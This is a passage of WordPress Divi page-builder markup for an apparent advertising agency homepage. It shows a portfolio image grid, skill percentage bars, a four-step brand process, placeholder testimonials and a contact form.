custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Advertising agency in delhi\" title_text=\"Advertising agency in delhi\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy for success\" title_text=\"marketing strategy for success\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" 